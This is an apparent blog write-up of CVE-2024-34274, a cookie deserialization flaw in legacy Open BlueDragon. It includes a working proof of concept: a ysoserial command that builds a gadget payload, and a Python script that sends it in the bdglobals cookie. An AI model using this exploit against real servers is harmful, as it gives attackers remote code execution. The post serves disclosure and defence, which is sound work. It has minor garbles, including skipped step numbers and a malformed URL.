If you're running an old version of Open BlueDragon (OpenBD), specifically the build 20210306203917-6cbe797, you should be aware of a critical security issue: CVE-2024-34274. This flaw lies in how the application handles cookie data, and it could let an attacker execute any code they want on your server.
In this deep-dive, I'll walk you through how the deserialization vulnerability works, what's at risk, and show a basic exploit concept. The original security notice is here: NVD - CVE-2024-34274
What Is The Problem?
OpenBD uses two cookies, bdglobals and bdclient_spot, to store data across user sessions. However, that data is serialized Java objects. The server-side code trusts the data in these cookies and deserializes it *without* checking where it came from!
Deserialization of untrusted data is dangerous in Java. If an attacker can control the serialized data, and certain "gadget" classes are available, they can make the server run any Java code.
This only affects legacy OpenBD – the project is not maintained, which means there will be no official fix.
How the Vulnerability Works
1. The application stores user session info in bdglobals or bdclient_spot cookies, using serialized Java objects.
On the server, OpenBD takes the cookie value and deserializes it, assuming it's safe.
4. If an attacker crafts their cookie value with malicious serialized data (a so-called "payload" or "gadget"), the server will deserialize and execute it.
Proof of Concept: Exploiting CVE-2024-34274
Warning: This is for educational and defensive purposes only.
If you don't own the system, never attack it!
Example Attack Flow
Suppose an attacker wants to open a reverse shell when their payload is deserialized. Here's how they could go about it:
1. Create a malicious Java serialized object that, when deserialized, triggers arbitrary code execution.
Sample Code: Generating a Malicious Cookie
For demonstration, let's use ysoserial (a tool for generating gadget-based payloads):
# Generate a serialized payload that runs "calc.exe" on Windows as PoC:
java -jar ysoserial.jar CommonsCollections1 "calc.exe" | base64 > payload.b64
Now, take the base64 output and use it as the value for the bdglobals or bdclient_spot cookie.
Python Example to Send the Malicious Cookie
import requests
payload = open('payload.b64').read().strip()
cookies = {'bdglobals': payload}
r = requests.get('http://victim-host:808/';, cookies=cookies)
print(r.text)
When OpenBD receives this request, it will try to deserialize the cookie, resulting in code execution.
References and Further Reading
- NVD CVE-2024-34274
- ysoserial Java deserialization tool
- OWASP: Deserialization Vulnerabilities
Conclusion
CVE-2024-34274 is a classic example of how insecure deserialization can sink a system. If you run OpenBD 20210306203917-6cbe797 or similarly old versions, *immediately* take steps to secure or replace your setup. Attackers only need a crafted cookie to get total shell access.
Stay safe: Deserialization is dangerous. Treat all untrusted data as dangerous—especially if you're deserializing it!
*If you found this post useful, please share it and review your legacy software for deserialization flaws! Let’s keep the internet safer for everyone.*
Timeline
Published on: 05/21/2024 20:15:08 UTC
Last modified on: 07/03/2024 01:59:50 UTC